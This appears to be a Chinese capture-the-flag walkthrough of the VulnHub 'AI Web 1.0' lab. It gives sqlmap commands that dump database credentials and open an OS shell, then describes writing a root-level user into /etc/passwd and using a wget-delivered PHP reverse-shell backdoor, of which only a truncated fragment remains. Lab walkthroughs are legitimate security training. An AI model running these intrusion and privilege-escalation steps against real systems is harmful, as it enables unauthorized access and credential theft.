VulnHub_AI_Web_1.0

一个粗糙的信息收集
使用nmap探测目标主机开放端口
VulnHub_AI_Web_1.0_第1张图片
访问robots.txt
VulnHub_AI_Web_1.0_第2张图片
访问http://192.168.31.126/se3reTdir777/
VulnHub_AI_Web_1.0_第3张图片
猜测可能存在注入点,使用Sqlmap进行探测

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" --dbs

VulnHub_AI_Web_1.0_第4张图片
获取数据库中的表

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 --tables

VulnHub_AI_Web_1.0_第5张图片
获取systemUser表中的字段名

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 -T systemUser --columns

VulnHub_AI_Web_1.0_第6张图片
获取字段内容

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 -T systemUser -C "userName,password" --dump

VulnHub_AI_Web_1.0_第7张图片
获取user表中内容
VulnHub_AI_Web_1.0_第8张图片
在数据库中没有获得有价值的信息
扫一下网站目录,找到一个info.php
VulnHub_AI_Web_1.0_第9张图片
访问页面发现是phpinfo
VulnHub_AI_Web_1.0_第10张图片
找到网站的物理路径
VulnHub_AI_Web_1.0_第11张图片
使用sqlmap获取shell

sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" --os-shell 
# 网站路径 
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

VulnHub_AI_Web_1.0_第12张图片
查看/etc/passwd权限,发现可以写入
在这里插入图片描述
使用卡里自带的openssl加密一下我们自己的账户
在这里插入图片描述
写入用户,UID,GID为0,根目录为root
在这里插入图片描述
尝试切换到test用户时提示需要一个终端
在这里插入图片描述
在本地写一个后门,使用wget下载的靶机

&3 2>&3");
?>

在这里插入图片描述
使用python搭建一个HTTP服务器

python -m SimpleHTTPServer 8080

在这里插入图片描述
使用wget下载到靶机
VulnHub_AI_Web_1.0_第13张图片
执行刚刚上传的文件
VulnHub_AI_Web_1.0_第14张图片
看到反弹回来一个shell
VulnHub_AI_Web_1.0_第15张图片
使用python创建一个交互式shell
在这里插入图片描述
切换用户,查看权限已经是root用户
VulnHub_AI_Web_1.0_第16张图片
查看flag
VulnHub_AI_Web_1.0_第17张图片

你可能感兴趣的:(CTF)